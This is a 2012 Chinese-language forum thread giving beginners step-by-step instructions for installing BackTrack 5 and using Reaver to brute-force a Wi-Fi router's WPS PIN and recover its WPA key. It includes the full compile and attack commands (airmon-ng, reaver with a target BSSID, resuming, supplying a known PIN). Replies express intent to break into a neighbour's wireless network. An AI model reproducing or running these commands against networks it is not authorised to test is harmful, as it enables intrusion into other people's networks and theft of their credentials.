写给新手-----PIN码穷举过程
本帖最后由 hwfsd 于 2012-1-23 20:22 编辑写给新手,老鸟们请无视飘过吧。测试系统建议BackTrack 5 R1。原因:对各种网卡驱动以及相关库支持的最好,下载Reaver后直接解压缩编译,毫无压力。步骤1:前提需要一个2G以上的U盘(最好4G,因为BackTrack 5 的ISO镜像文件1.9G,2G U盘能否启动成功不确定)。使用UNetBootin制作BackTack 5 安装引导U盘。(不建议使用UltraISO) 步骤2:(警告:新手小心谨慎!!!如出现硬盘数据丢失或全盘格式化,概不负责!!!)用PE在Windows分区之后(不要和Windows分区交叉)空余出至少20G硬盘空间,状态为自由,未分配,留着分给“/” 与 ” swap“。重启电脑,BIOS里设置一下U盘启动,出现引导界面, 输入:startx就可以进入BackTrack 5系统了。双击左上角Install,将BackTrack 5 安装到先前划分的20G空白硬盘空间。(1)语言选择 自己喜好而定,有中文可选(2)地区选择 亚洲中国(3)键盘布局 默认就好(4)选手动指定分区(特别需要注意,别选错)(5)选中未分配那块空间,点击 “添加” 逻辑分区 大小2000MB 用于 “交换空间”(6)选中剩余那块未分配空间, 点击 “添加” 逻辑分区 大小为剩余全部 用于“ext4日志文件系统” 挂载点 “/”。(7)安装过程
完成后重启默认第一启动选项为BackTrack 5。
步骤3: 将Reaver1.3版放到桌面,开终端 cd /root/Desktop tar zxvf reaver-1.3.tar.gz
cd reaver-1.3/src
./configure
make
make install
airmon-ng start wlan0
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv
后面就是漫长的等待了,运气好3-5个小时会穷举成功(主要看人品),运气不好(尤其MAC为5C:6C:BF:XX:XX:XX的AP),等待你的可能会是一堆WARNING: Receive timeout occurred。
ps:貌似802.11N的AP才有wps功能,802.11g802.11b请绕道。
ps: 遇到长时间 WARNING: Receive timeout occurred Ctrl + c 组合键保存进度退出即可。下次测试直接选 "y"读取进度即可,省时省力。
ps: 指定PIN得到WPA PSK
reaver -i mon0 -b xx:xx:xx:xx:xx:xx --pin=xxxxxxxx
ps:2012/01/23 (大年初一) reaver1.4正式版发布 链接如下
http://code.google.com/p/reaver-wps/downloads/list
占个沙发吧。留作备用。 顶一个,闲时学用一次. linux新手 一直为这个程序怎么编译安装郁闷
看了此贴受益匪浅 回复 4# hanoi2012
编译安装so easy 平时多Google一下就好了。 顶 hwfsd 兄弟,学习下,看看能不能把我周围那个老是开着又不用无线的破了,谢谢hwfsd兄弟! 回复 6# fisso
前提AP是802.11n,wps功能目前国人99%都开着。 呵呵,有点复杂,看来我的160g的小硬盘是搞不了,留着,以后用, 目前在測試中 用VM+BT5ISO跑的
基本上不會用太多空間 回复 9# hk11
等待分享经验:) 本帖最后由 hk11 于 2012-1-8 00:35 编辑
回复hk11
等待分享经验
hwfsd 发表于 2012-1-8 00:21 http://forum.anywlan.com/images/common/back.gif
現在只跑到15%
還有reaver解說中可以看看 -a -S參數
有時候 網卡會罷工出現error 132之類的
只要把網卡重新插入 再用ifconfig wlan0 up就可以了 顶一个,闲时学用一次.